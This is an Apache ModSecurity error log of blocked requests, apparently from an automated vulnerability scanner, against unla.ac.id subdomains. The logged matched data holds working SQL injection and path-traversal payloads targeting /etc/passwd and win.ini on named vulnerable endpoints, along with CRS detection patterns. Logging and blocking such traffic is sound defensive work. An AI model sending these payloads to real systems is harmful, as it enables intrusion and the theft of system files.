[Tue Aug 29 11:46:21.362431 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HcCo-f0AAAi5uFoAAAAS"]
[Tue Aug 29 11:46:21.437544 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HcCo-f0AAAi0JLIAAAAK"]
[Tue Aug 29 11:46:22.463958 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAhui18AAAAr"]
[Tue Aug 29 11:46:22.494975 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAib53QAAAAA"]
[Tue Aug 29 11:46:22.497432 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAhrqRwAAAAo"]
[Tue Aug 29 11:46:22.533609 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAi0JLcAAAAK"]
[Tue Aug 29 11:46:22.573137 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAdxUuMAAAAC"]
[Tue Aug 29 11:46:23.487169 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14H8Co-f0AAAi0JL4AAAAK"]
[Tue Aug 29 11:46:27.380102 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAhBSIcAAAAX"]
[Tue Aug 29 11:46:27.443821 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi-RBsAAAAH"]
[Tue Aug 29 11:46:27.446599 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAhZRpAAAAAG"]
[Tue Aug 29 11:46:27.466542 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi-RBwAAAAH"]
[Tue Aug 29 11:46:27.510120 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14I8Co-f0AAAhZRpMAAAAG"]
[Tue Aug 29 11:46:27.623184 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAhZRpgAAAAG"]
[Tue Aug 29 11:46:28.368364 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAi-RB8AAAAH"]
[Tue Aug 29 11:46:28.406950 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAdxUvMAAAAC"]
[Tue Aug 29 11:46:28.413231 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhBSIsAAAAX"]
[Tue Aug 29 11:46:28.430087 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhui4UAAAAr"]
[Tue Aug 29 11:46:28.431429 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhrqSMAAAAo"]
[Tue Aug 29 11:46:28.443481 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14JMCo-f0AAAhl0DgAAAAi"]
[Tue Aug 29 11:46:28.452414 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAib55kAAAAA"]
[Tue Aug 29 11:46:28.507082 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhui4YAAAAr"]
[Tue Aug 29 11:46:28.507387 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhBSIwAAAAX"]
[Tue Aug 29 11:46:28.507555 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhZRp4AAAAG"]
[Tue Aug 29 11:46:28.521752 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhl0DoAAAAi"]
[Tue Aug 29 11:46:28.527004 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhT34gAAAAD"]
[Tue Aug 29 11:46:28.548038 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAi0JN8AAAAK"]
[Tue Aug 29 11:46:28.549409 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhrqSYAAAAo"]
[Tue Aug 29 11:46:28.564330 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhZRp8AAAAG"]
[Tue Aug 29 11:46:28.564711 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAi5uGoAAAAS"]
[Tue Aug 29 11:46:29.718677 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAhzvjoAAAAx"]
[Tue Aug 29 11:46:29.768029 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOwAAAAK"]
[Tue Aug 29 11:46:29.771935 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAjCa8AAAAAB"]
